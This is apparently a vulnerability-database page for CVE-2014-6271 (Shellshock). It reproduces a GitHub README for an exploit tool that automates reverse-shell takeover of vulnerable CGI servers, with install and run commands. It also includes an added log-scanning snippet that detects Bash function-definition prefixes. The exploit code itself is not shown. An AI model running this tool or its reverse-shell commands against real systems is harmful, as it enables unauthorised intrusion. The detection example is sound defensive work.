Associated Vulnerability
Title: GNU Bash Remote Code Execution Vulnerability (CVE-2014-6271)
Description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Description
The Shellshock Exploit is a tool designed to efficiently exploit the Shellshock vulnerability (CVE-2014-6271) in susceptible CGI servers, enabling a precise takeover of the target server. Shellshock is a critical security vulnerability that affects the Bash shell, allowing attackers to execute arbitrary commands on the targeted system.
Readme
# Shellshock Exploit (CVE-2014-6271)
## Key Features
- **Exploit Automation:** Automates the exploitation of the Shellshock vulnerability in CGI scripts, streamlining the process for penetration testing and security research.
- **Reverse Shell Connectivity:** Provides options for establishing a reverse shell connection to the target server, supporting various methods such as Netcat (nc), TCP, and PHP.
- **Customizable Options:** Allows users to specify the target host, CGI script, remote host for the reverse shell, port, and preferred shell method through command-line options.
## CVE Information
- CVE Number: [CVE-2014-6271](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)
- CVE Description: Bash through 4.3 allows remote attackers to execute arbitrary commands via crafted environment variables passed to Bash scripts.
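On the defensive side, the condition in the CVE description leaves a recognizable trace in web server logs: a client-controlled field whose value begins a Bash function definition. The following is an added example, not code from this repository; it scans log lines for that prefix, and the log format, sample lines and function name are assumptions made for illustration.

```python
import re

# An exported Bash function arrives in the environment as a value starting
# with "() {". CVE-2014-6271 concerns text that trails such a definition.
FUNC_DEF = re.compile(r"\(\s*\)\s*\{")

# Constructed log format (assumption): ip "request" status "referer" "agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) "(?P<request>[^"]*)" (?P<status>\d{3}) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Client-controlled fields that a CGI server hands to the script as
# environment variables.
CLIENT_FIELDS = ("request", "referer", "agent")

# Constructed sample lines; addresses come from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '198.51.100.7 "GET /cgi/test HTTP/1.1" 200 "-" "() { :; }; constructed-trailing-text"',
    '198.51.100.7 "GET /cgi/test HTTP/1.1" 500 "() { x; }; constructed-trailing-text" "curl/8.0"',
    '192.0.2.44 "GET /docs/func() HTTP/1.1" 404 "-" "Mozilla/5.0"',
    'truncated line without the expected fields',
]


def find_function_definitions(lines):
    """Return (line_number, client_ip, field) for every client-controlled
    field whose value contains a Bash function-definition prefix."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LOG_LINE.match(line.strip())
        if match is None:
            continue  # unparseable lines are skipped, not reported as hits
        for field in CLIENT_FIELDS:
            if FUNC_DEF.search(match.group(field)):
                hits.append((number, match.group("ip"), field))
    return hits


if __name__ == "__main__":
    for number, ip, field in find_function_definitions(SAMPLE_LOG):
        print(f"line {number}: {ip} sent a function definition in {field}")
```

A hit shows that a request carried the pattern, not that the server was vulnerable; whether Bash is affected depends on the installed version, including the follow-up fix for CVE-2014-7169 noted in the description above.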
## How it Works

## Requirements
**Debian/Ubuntu**
```
sudo apt-get install libcurl4-openssl-dev
```
**Red Hat/Fedora**
```
sudo dnf install libcurl-devel
```
**macOS (Homebrew)**
```
brew install curl-openssl
```
After installing the libcurl development package, clone the CVE-2014-6271-Shellshock repository, install its Python dependencies, and run the tool:
```
git clone https://github.com/MY7H404/CVE-2014-6271-Shellshock.git
cd CVE-2014-6271-Shellshock
pip3 install -r requirements.txt
python3 shellshock.py -a HOST -u /cgi/test -r REMOTE -p 1337 -s tcp
```
## Usage
```
python3 shellshock.py [-h] -a HOST -u URI -r REMOTE -p PORT [-s {nc,tcp,php}]
```
## Options
```
-h, --help: Show help message and exit
-a HOST, --host HOST: Specify a remote host to test
-u URI, --uri URI: Specify a CGI script to test (e.g., /cgi/test)
-r REMOTE, --remote REMOTE: Specify the host for the reverse shell connection
-p PORT, --port PORT: Specify the port for the reverse shell connection
-s {nc,tcp,php}, --shell {nc,tcp,php}: Choose your preferred reverse shell method for seamless connectivity (default 'nc')
```
## Example
```
python3 shellshock.py -a 10.10.10.10 -u /cgi/test -r localhost -p 4444 -s tcp
```
## Disclaimer
This tool is created for educational and testing purposes only. The authors and contributors are not responsible for any illegal, unethical, or unauthorized use of this tool. Users are solely responsible for ensuring that their use of this tool complies with all applicable laws, regulations, and ethical standards.
Usage of this tool on systems or networks without explicit authorization is strictly prohibited. The authors and contributors disclaim any responsibility for any damage, loss of data, or other consequences resulting from the use of this tool.
By using this tool, you acknowledge that you have read, understood, and agree to abide by the terms of this disclaimer.
**Use responsibly and ethically.**
## License
This project is licensed under the [MIT License](https://github.com/MY7H404/CVE-2014-6271-Shellshock/blob/main/LICENSE).
File Snapshot
[4.0K] /data/pocs/aa8d6168315cb808af04eb4fb19daf387fa1e8a5
├── [556K] gif.gif
├── [1.0K] LICENSE
├── [3.2K] README.md
├── [ 36] requirements.txt
└── [6.0K] shellshock.py
0 directories, 5 files